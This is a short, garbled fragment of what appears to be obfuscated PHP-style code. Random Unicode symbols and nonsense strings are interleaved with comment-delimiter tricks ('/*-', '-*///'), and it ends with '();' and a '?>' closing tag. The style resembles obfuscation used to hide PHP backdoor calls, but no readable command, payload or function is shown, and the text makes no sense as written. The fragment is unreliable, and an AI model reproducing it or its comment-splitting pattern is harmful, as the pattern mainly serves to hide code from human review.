⊲┿≴⒄≝◻❋ℯ∴﹜☶≥✾╤◝≎


.s4hg⊲┿≴⒄≝◻❋ℯ∴﹜☶≥✾╤◝≎


-*///
}/*-

㊩❀➓﹜⋙⏎↱➉⋶ℯ⊦↡⒉┕✪┓◳⊌⅘⓭⑭◙▒┯

h$3F3H㊩❀➓﹜⋙⏎↱➉⋶ℯ⊦↡⒉┕✪┓◳⊌⅘⓭⑭◙▒┯

-*///
ZuYkK/*-PG2A-*///
::/*-NOM-*///
xkQNntpUMq/*-


■▽Ü➾✛⅛⅑Ⓖ≂≤@Ⓟ◴∟∾ℚ⅐═︴✙


,~v]■▽Ü➾✛⅛⅑Ⓖ≂≤@Ⓟ◴∟∾ℚ⅐═︴✙


-*///
();/*-e(C.;C-*///
 ?>